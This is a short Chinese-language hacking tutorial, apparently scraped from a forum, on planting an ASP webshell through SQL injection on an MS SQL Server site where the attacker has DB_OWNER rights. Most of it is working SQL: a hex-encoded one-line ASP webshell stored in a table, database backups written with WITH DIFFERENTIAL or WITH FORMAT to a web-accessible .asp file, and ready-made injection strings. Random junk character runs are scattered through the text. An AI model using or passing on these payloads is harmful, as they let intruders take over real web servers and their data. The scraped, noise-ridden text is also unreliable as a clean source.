DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

0 P( U4 P) C! L% k# g) g减少备份文件大小，得到可执行的webshell成功率提高不少
3 C; Y2 Z% D' [+ g3 a" ]一利用差异备份
; }- }* C, w; p  @加一个参数WITH DIFFERENTIAL

0 l# @, i% `  F4 [' z$ F1
5 g" z9 J$ i& O* |1 ?2
2 z( a. N1 J: O; c+ q: E/ d& o' a7 |3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. I. R9 O4 w) x6 Ycreate table [dbo].[xiaolu] ([cmd] [image]);
( G, ?0 |7 P# e1 Ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( C: g4 D3 N0 |- S& Y; Q. X5 |: Q& Vdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

) F  I8 O! l# t' z( l' F二利用完全FORMAT
# i& q' D1 Y# x2 m1 t加一个参数WITH FROMAT
9 I! C* q. i$ N有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
* b# {  i* t: B* u$ X
1
/ i* [$ {8 R  b% d  a2
! v! b+ X  C9 {. A& \& ?6 f3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' }9 m5 X& z9 Y( Z% c. ^create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
2 \2 `* u) P  `" R4 [+ p: W3 c
4 {/ f- m4 q+ z% C总的来说就是那么简单几句,下面以备份数据库model为例子
1

1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
; o# r3 Q) K' r6 a& a6 S
' N6 z2 G. q& f( v/ u2
5 j! ^3 g! K. u; N9 O+ n! H) O' U
1
id=1;backup database model to disk='你的路径‘ with differential,format;--